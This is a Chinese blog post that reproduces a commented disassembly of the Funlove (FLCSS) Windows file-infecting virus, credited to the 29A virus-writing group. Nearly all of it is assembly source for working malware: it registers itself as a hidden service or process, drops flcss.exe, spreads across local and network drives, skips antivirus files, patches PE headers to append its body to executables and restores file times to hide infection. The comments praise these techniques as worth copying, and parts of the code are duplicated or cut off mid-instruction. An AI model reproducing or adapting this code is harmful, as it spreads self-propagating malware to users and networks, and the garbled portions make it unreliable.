国际著名病毒编写组织29A出品--Funlove

cafardhaibin

于 2007-03-19 15:01:00 发布

阅读量1.9k

点赞数

分类专栏：黑白两道文章标签： buffer service windows dos import c

版权声明：本文为博主原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。

本文链接：https://blog.csdn.net/cafardhaibin/article/details/1533738

版权

黑白两道专栏收录该内容

4 篇文章 0 订阅

订阅专栏

;***********************************************
;          Flcss.asm
;
;          disasm by Code Demon
;
;          Code Demon Virus Dreaming Factory
;
;*

.586

ASSUME      CS:CODE,DS:CODE

CODE        SEGMENT      USE32

VSize  equ        offset      VEnd - VStart

Phys_VSize equ          1000

main:
;*
; 开始代码
;*
VStart:

      call        GetDelta        ;此子程序用于取得病毒在内存中的开始地址,是绝大
          ;多数病毒都要用到的经典技术只一,对于写一些加密
          ;的软件有很大的帮助,莱鸟必看
      lea          esi,[offset HostCode + ebx]
      mov          edi,[esp]
      sub          edi,08
      mov          [esp],edi
      movsd
      movsd

      push        dword ptr [esp + 04]
      call        RelocKernel32    ;重定位Kernel32

    or          eax,eax
    jz          short Exit

      cmp          byte ptr [offset OS + ebx],00;判断操作系统的类型
      jnz          short NT_Srv

      call        Create9xProcess  ;建立WIN9X进程
          ret

NT_Srv:  call        CreateNTService  ;建立NT服务
Exit:        ret
;*
;建立NT服务的子程序
;*
CreateNTService:

      call        RelocAdvapi32

    or          eax,eax
    jz          short CNT_Failed

      push    02
      push  00
      push  00          ; 取服务管理器的句柄
      call        OpenSCManagerA

    or          eax,eax
    jz          short CNT_Failed

      mov          SCM_Handle,eax

      call        CreateExecutable  ;建立FLCSS.EXE,

    or        eax,eax        ; 已经驻留内存就退出.
    jz          short CNT_Exit

      mov          edi,0F01FF
      lea          esi,offset [Service + ebx]
      push      edi
      push      esi
      push        SCM_Handle
      call        OpenServiceA

    or          eax,eax
      jnz          short CNT_Run

      xor          eax,eax
      push      eax
      push      eax
      push      eax
      push      eax
      push      eax
      lea          eax,[offset Buffer1 + ebx] ;  flcss.exe
      push      eax
      push  01          ;错误代码
      push  02          ; 开始
      push  20          ; 类型
      push      edi
      push    00
      push      esi
      push        SCM_Handle    ;句柄
      call        CreateServiceA  ;建立服务

    or          eax,eax
    jz          short CNT_Failed

CNT_Run:

      push    00
      push    00
      push      eax
      call        StartServiceA    ;开始服务

    or          eax,eax
      jnz          short CNT_Exit

CNT_Failed:

      call        StartInfectionThread ;传染子程序

CNT_Exit:

          ret
;*
;建立WIN9X进程的子程序
;*
Create9xProcess:
;注意了:生成FLCSS.EXE,很多人的机子杀不绝,就是因为它在作怪.
      call        CreateExecutable

    or          eax,eax
    jz          short P9x_Exit
P9x_00:
      xor          eax,eax
      lea          edi,[offset Buffer2 + ebx]
      push      edi
      push      edi
      mov          ecx,040
      repz        stosd

      mov        cl,06
      push      eax
      loop        $ - 1

      lea          esi,[offset Buffer1 + ebx]
      push      esi
      push    00
      call        CreateProcessA      ;创建进程

    or          eax,eax
      jnz          short P9x_Exit

P9x_Failed:

      call        StartInfectionThread;传染子程序

P9x_Exit:
          ret

;注意了:生成FLCSS.EXE,很多人的机子杀不绝,就是因为它在作怪.

CreateExecutable:
      lea          edi,[offset Buffer1 + ebx]
      push        edi

      push      104
      push      edi
      call        GetSystemDirectoryA          ;取得系统目录

      add          edi,eax
      mov          al,'/'
          stosb
      lea          esi,[offset Process + ebx]
          movsd
          movsd
          movsd

      push  02
      call        OpenFile

      cmp          eax,-1
    jz          short CE_Exit

      mov          c_FileHandle,eax

      lea          edi,[offset VImports + ebx]      ;清除 import
      mov          eax,-1
          stosd
          stosd

      lea          edi,[offset Kernel32_Relocated + ebx] ;第二个 import
      mov          eax,[edi - 8]
          stosd

      push    00
      lea          esi,c_BytesWritten
      push      esi
      push      0200
      push      ebx
      push        c_FileHandle
      call        WriteFile          ; 写文件头

      push    00
      push      esi
      push      1000
      push      ebx
      push        c_FileHandle
      call        WriteFile          ; 写入病毒主体

      push        c_FileHandle
      call        CloseHandle          ;关闭文件

CE_Exit:
      inc      eax
          ret
;
;以下应该是病毒的服务程序
;
VService:

      call        GetDelta

      push        dword ptr [esp]
      call        RelocKernel32

    or          eax,eax
    jz          VS_Exit

      cmp          byte ptr [offset OS + ebx],00    ;操作系统的类型
    jz          short W9x_Service_Register          ;注册WIN9X服务

WNT_Service_Hacknowledge:

      call        RelocAdvapi32          ;重定位Advapi32
    or          eax,eax
    jz          VS_Exit

      lea          esi,[offset Buffer1 + ebx]

      xor          eax,eax
      lea          ecx,[offset Service + ebx]
      lea          edx,[offset ServiceDispatcher + ebx]
      mov          [esi],ecx
      mov          [esi + 04],edx
      mov          [esi + 08],eax
      mov          [esi + 0C],eax      ; 将控制权返回给调用者

      push      esi
      call        StartServiceCtrlDispatcherA

W9x_Service_Register:

      lea          esi,[offset USER32_Name + ebx]
      push      esi
      call        LoadLibraryA

      lea          esi,[offset RegisterClassA+ ebx]
      push      esi
      push      eax
      call        GetProcAddress          ;取进程的地址

    or          eax,eax
    jz          short VS_00

      mov          [esi - 06],eax

      lea          esi,[offset Buffer1 + ebx]
      mov          edi,esi
      xor          eax,eax
      mov          ecx,0A
      repz        stosd

      mov          dword ptr [esi + 04],-1
      mov          dword ptr [esi + 10],400000  ; WINDOWS9X的基址
      lea          eax,[offset Service + ebx]
      mov          [esi + 24],eax

      push      esi
      call        RegisterClassA      ; 这里非常重要

      lea          esi,[offset RegisterServiceProcess+ ebx]
      push      esi
      push        dword ptr [offset Kernel32_Base + ebx]
      call        GetProcAddress

    or          eax,eax
    jz          short VS_00

      mov          [esi - 06],eax

      call        GetCurrentProcessId  ;取当前进程的ID
          ; 注册为服务

      call        GetCurrentProcessId  ;取当前进程的ID
          ; 注册为服务进程,防止被用户
      push  01          ;用CTRL+ALR+DEL从任务管理器中发现
      push    eax
      call        RegisterServiceProcess

      push    8000          ; 延时
      call        Sleep

VS_00:
      call        StartInfectionThread

VS_Exit:
          ret
;*
;NT服务子程序
;*
ServiceDispatcher:
      call        GetDelta
      lea          esi,[offset ServiceHandler + ebx]
      lea          edi,[offset Service + ebx]
      push      esi
      push      edi
      call        RegisterServiceCtrlHandlerA

      mov          Service_Handle,eax

      lea          esi,[offset Buffer1 + ebx]
      mov          edi,esi
      mov          ecx,06
      xor          eax,eax
      repz        stosd

      mov          dword ptr [esi],10
      mov          dword ptr [esi + 04],04
      mov          dword ptr [esi + 08],07

      push    esi
      push        Service_Handle    ;告诉WINDOWS服务已经正确的运行
      call        SetServiceStatus

      push      8000
      call        Sleep

      call        StartInfectionThread  ;建立进程
          ret

ServiceHandler:

      ret          ; 当管理员关闭服务时,提示系统出错!好东西!!!
;*
;此子程序用于建立线程
;*
StartInfectionThread:
      call        GetTickCount
      mov        [offset Rand + ebx],eax

      lea          eax,ThreadId
      push      eax
      push    0
      push    0
      lea          eax,[offset VThread + ebx]
      push      eax
      push    0
      push    0
      call        CreateThread
          ret
;*
; 病毒线程
;*
VThread:
      call        GetDelta

      call        InfectDrives        ;感染本地文件

      push        60000
      call        Sleep

      call        GetRand
      and        al,1F
      jnz          short VThread

      call        InfectNetwork        ;感染网络文件
      jmp          short VThread

;
; 通过网络传染的子程序,值得借鉴
;
InfectNetwork:
      lea          eax,[offset MPR_Name + ebx]
      push      eax
      call        LoadLibraryA

    or          eax,eax
    jz          short INet_Failed

      push      eax
      lea          esi,[offset MPR_Functions + ebx]
      push      esi
      call        DLL_Relocate

    or          eax,eax
    jz          short INet_Failed

      push    00
      call        NetSearch

INet_Failed:
          ret
;*
; 此子程序用于测试驱动器是否有效
;*
InfectDrives:
      push        esi

      call        GetTickCount
      mov        [offset Tick + ebx],eax

      lea          esi,[offset Buffer1 + ebx]
      mov          dword ptr [esi],' /:+ ebx - offset VStart'

ID_TestDrive:

      mov          byte ptr [esi + 03],00
      push      esi
      call        GetDriveTypeA          ;取驱动器类型

      cmp      al,03          ;硬盘?
    jz          short ID_DriveOk

      cmp      al,04          ;网络驱动器?
      jnz          short ID_Invalid

ID_DriveOk:

      add          esi,03

      push      esi
      call        BlownAway

      push      esi
      call        FileSearch          ;查找文件

      sub          esi,03

ID_Invalid:

      mov          al,[offset Buffer1 + ebx]
      inc      al
      mov        [offset Buffer1 + ebx],al

      cmp          al,'Z'
      jna          short ID_TestDrive

      pop      esi
          ret
;*
;查找计算机
;*****
NetSearch :
      mov          EnumBufferSize,4000
    or          EnumNB_Objects,-1

      lea          eax,WNetStructAddr
      push      eax
      push        WNetStructAddr
      push    0
      push    0
      push    2
      call        WNetOpenEnumA

    or          eax,eax
      jnz          NET_Close

      push    04
      push      1000
      push      4000
      push    00
      call        VirtualAlloc

    or          eax,eax
    jz          short NET_Close

      mov          EnumBufferAddr,eax

NET_00:

      mov          esi,EnumBufferAddr

      lea          eax,EnumBufferSize
      push      eax
      push      esi
      lea          eax,EnumNB_Objects
      push      eax
      push        WNetStructAddr
      call        WNetEnumResourceA

    or          eax,eax
      jnz          short NET_Free

      mov          ecx,EnumNB_Objects
    or          ecx,ecx
    jz          short NET_00

NET_01:
      push      ecx
      push        esi

      mov          esi,[esi + 14]          ; 计算机名
    or        esi,esi
    jz          short NET_03

      cmp          word ptr [esi],0041      ; 是否为软盘
    jz          short NET_03

      lea          edi,[offset Buffer1 + ebx]

NET_02:

          movsb
      cmp          byte ptr [esi],00
      jnz          short NET_02

      mov          al,'/'
          stosb

      push      edi
      call        BlownAway

      push      edi
      call        FileSearch

NET_03:

      pop        esi

      mov          eax,[esi + 0C]
      and        al,2
      cmp        al,2
      jnz          short NET_04

      push      esi
      call        NetSearch

NET_04:
      add          esi,20
      pop      ecx
      loop        NET_01

      jmp          short NET_00

NET_Free:
      push      8000
      push    00
      push        EnumBufferAddr
      call        VirtualFree

NET_Close:
      push        WNetStructAddr
      call        WNetCloseEnum
          ret
;*
; 查找文件子程序,这些跟以前DOS下没什么区别,
;
; 我还是喜欢用IFS_HOOK,可以做到全隐形哦,那感觉就是一个字--爽!  ^_^
;*******************************************
FileSearch:
      mov          eax,CurrentDirEnd
      mov          dword ptr [eax],002A2E2A  ; .

      lea          edi,[offset Buffer2 + ebx]
      lea          esi,[offset Buffer1 + ebx]
      push      edi
      push      esi
      call        FindFirstFileA          ;找第一个文件

      cmp          eax,-1
    jz          short RS_Exit

RS_00:
      mov          SearchHandle,eax

RS_01:
      test        byte ptr [edi],10        ; 测试是目录还是文件
    jz          short FileTest

RS_Directory:

      cmp          byte ptr [edi + 2C],'.'
    jz          short RS_Next

      mov          esi,edi
      add          esi,2C

      mov          edi,CurrentDirEnd

RSD_00:
          movsb
      cmp          byte ptr [esi],0
      jnz          short RSD_00

      mov          al,'/'
          stosb

      push      edi
      call        FileSearch

RS_Next:
      lea          edi,[offset Buffer2 + ebx]
      push      edi
      push        SearchHandle
      call        FindNextFileA          ;查找下一个文件

    or          eax,eax
      jnz          short RS_01

      push        SearchHand

      RS_Next:
      lea          edi,[offset Buffer2 + ebx]
      push      edi
      push        SearchHandle
      call        FindNextFileA          ;查找下一个文件

    or          eax,eax
      jnz          short RS_01

      push        SearchHandle
      call        FindClose

RS_Exit:
          ret
;************************
;没什么新意,略过吧
;
FileTest:

      mov          edx,[edi + 2C]
    or          edx,20202020
      xor          edx,61F81F61

      lea          esi,[offset SkipNames + ebx] ; 跳过一些反病毒软件的感染
      mov          ecx,0C

FT_00:
          lodsd
      cmp          edx,eax
    jz          short FT_Exit

      loop        FT_00

;
;注意拉,
;
      mov          esi,edi
      add          esi,2C

FT_01:
          lodsb
    or        al,al
      jnz          short FT_01

      mov          eax,[esi - 4]          ; 扩展名判断
    or          eax,20202020

      cmp          eax,' xco'        ;控件
    jz          short FT_02

      cmp          eax,' rcs'          ;屏幕保护文件
    jz          short FT_02

      cmp          eax,' exe'          ;标准的EXE文件
      jnz          short FT_Exit

FT_02:
      mov          eax,[edi + 20]          ; 文件小于2000的就不感染
      cmp          eax,2000
    jc          short FT_Exit

      cmp      al,03          ; 检测是否已经感染
    jz          short FT_Exit

      lea          esi,[offset Buffer1 + ebx]          ; 取文件名和路径
      lea          edi,[offset Buffer3 + ebx]
      push        edi

      mov          ecx,CurrentDirEnd
      sub          ecx,esi
      repz        movsb

      lea          esi,[offset Buffer2 + ebx]
      add          esi,2C

FT_03:
          movsb
      cmp          byte ptr [esi - 1],0
      jnz          short FT_03

      call        InfectFile        ;干活了,

FT_Exit:
      jmp          RS_Next
;*
;感染文件子程序
;*****
InfectFile:
      push        i_Filename
      push  03          ; 打开文件
      call        OpenFile

      cmp          eax,-1
    jz          IN_Exit

      mov          i_FileHandle,eax

      push    00
      push      eax
      call        GetFileSize          ;取文件大小,用于以后还原

      mov          i_FileSize,eax

      cmp      al,03          ; 是否感染
    jz        IN_Exit

      lea          edi,[offset Buffer3 + ebx]

      push    00
      lea          esi,i_BytesRead
      push      esi
      push      2000
      push      edi
      push        i_FileHandle
      call        ReadFile

;*
;以下的程序跟文件头有关,建议没基础者找一些相关资料看看
;*****************************************
      cmp          word ptr [edi],5A4Dh        ;DOS文件头,开始有点印象了吧
      jnz          IN_CloseFile

      cmp          word ptr [edi + 18],0040    ;是否为WINDOWS文件,此处>=40H,则为WINDOWS文件,<40H则为DOS文件
      jnz          IN_CloseFile

      cmp          dword ptr [edi + 3C],1C00  ; DOS文件头的大小
    ja          IN_CloseFile

      add          edi,[edi + 3C]          ;指向PE或NE文件头

      mov          eax,[edi]
      cmp          eax,00004550          ;PE文件吗?
      jnz          IN_CloseFile          ;此步必须,因为WIN3.X的18H的值也大于等于40H

      cmp          word ptr [edi + 5C],2    ; GUI????
      jnz          IN_CloseFile

      mov          esi,edi
      add          esi,18
      add        si,[edi + 14]          ; 将ESI指向第一个节表
      push        esi

      mov          eax,[edi + 28]          ; 查找包含"PE"的节表

IN_00:
      mov          ecx,[esi + 0C]
      add          ecx,[esi + 08]

      cmp          eax,ecx
    jc          short IN_01

      add          esi,28
      jmp          short IN_00

IN_01:
      sub          eax,[esi + 0C]
      add          eax,[esi + 14]
      mov          i_EP_Offset,eax

    or          [esi + 24],80000000      ; 将它改为可写,这里是WINDOWS跟
          ;DOS在程序和数据段上的一个重要改变
          ;也是写WINDOWS病毒要注意的地方之一
      pop    esi
      xor          ecx,ecx
      mov        cx,[edi + 06]
      dec      ecx
      mov          eax,ecx
      mov          edx,28
      mul      edx
      add        esi,eax          ; ESI指向最后一个节表

      mov          eax,[esi + 24]
      cmp      al,80          ; 是否已经初始化
    jz          IN_CloseFile

    or          eax,8C000000          ; 将它改为可写,
      and        eax,not 12000000          ; 不共享,不可丢弃
      mov          [esi + 24],eax

      mov          ecx,i_FileSize          ;这里好象跟SFX有点关系
      mov          edx,ecx
      mov          eax,ecx
        clc
      shr          eax,03
      sub          edx,eax
      sub          edx,[esi + 14]
    jc          short IN_02

      sub          edx,[esi + 10]
      jnc          IN_CloseFile

IN_02:          ; 重新计算节的长度

      mov          edx,[esi + 08]

      sub          ecx,[esi + 14]
    jc          short IN_03

      cmp          edx,ecx
    ja          short IN_03

      mov          edx,ecx

IN_03:
      test        edx,00000FFF
    jz          short IN_04

      and          edx,0FFFFF000
      add          edx,1000

IN_04:
      mov          ecx,edx
      add          ecx,[esi + 0C]
      mov          eax,ecx
      add          eax,4000
      mov          [edi + 50],eax          ; 新的长度

      sub          ecx,[edi + 28]
      add          ecx,offset VStart - 100 - 08
      mov          i_HostDep32,ecx

      mov        eax,edx
      add          eax,4000          ; 改变虚拟大小
      mov          [esi + 08],eax

      mov        eax,edx
      add          eax,[esi + 14]
      mov          i_VirusOffset,eax

      add          edx,1000          ; 改变物理大小
      mov          [esi + 10],edx
      add          edx,[esi + 14]
      add          edx,03

      push        i_FileHandle
      push      edx
      call        MapFile

    or          eax,eax
    jz          short IN_CloseFile

      mov          i_MapHandle,eax

      push      eax
      call        ViewMap

    or          eax,eax
    jz          short IN_CloseMap

      mov          edx,eax

      lea          esi,[offset Buffer3 + ebx]          ; 写PE文件头
      mov          edi,edx
      mov          ecx,2000
      repz        movsb

      lea          edi,[offset HostCode + ebx]
      mov          esi,i_EP_Offset
      add          esi,edx
          movsd
          movsd

      mov        edi,esi          ; 设置CALL GS:Virus
      sub          edi,08
      mov          eax,00E8659090
          stosd
      mov          eax,i_HostDep32
          stosd

      mov        edi,edx
      mov          eax,i_FileSize
      mov          ecx,i_VirusOffset
      sub          ecx,eax
      jna          short IN_05

      add          edi,eax
      xor        al,al
      repz        stosb

IN_05:
      mov        esi,ebx          ;写入病毒主体
      mov          edi,edx
      add          edi,i_VirusOffset
      mov          ecx,VSize
      repz        movsb

      mov          ecx,Phys_VSize - VSize + 3
      repz        stosb

      push      edx
      call        UnmapViewOfFile

IN_CloseMap:

      push        i_MapHandle
      call        CloseHandle          ;关闭

      call        Wait_A_Little          ;延时

IN_CloseFile:

      lea          esi,[offset Buffer2 + 14 + ebx]      ; 恢复文件的时间
      push      esi
      sub          esi,08
      push      esi
      sub          esi,08
      push      esi
      push        i_FileHandle
      call        SetFileTime

      push        i_FileHandle
      call        CloseHandle          ;关闭文件

IN_Exit:
          ret
...

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
国际著名病毒编写组织29A出品--Funlove

;********************************************************************************************* ; Flcss.asm ; ; disasm by Code Demon ; ; Code Demon Virus Dreaming Facto
复制链接

扫一扫

专栏目录

评论

被折叠的条评论为什么被折叠?

到【灌水乐园】发言

查看更多评论

添加红包

成就一亿技术人!

hope_wisdom

发出的红包

实付元

使用余额支付

点击重新获取

扫码支付

钱包余额 0

抵扣说明：

1.余额是钱包充值的虚拟货币，按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载，可以购买VIP、付费专栏及课程。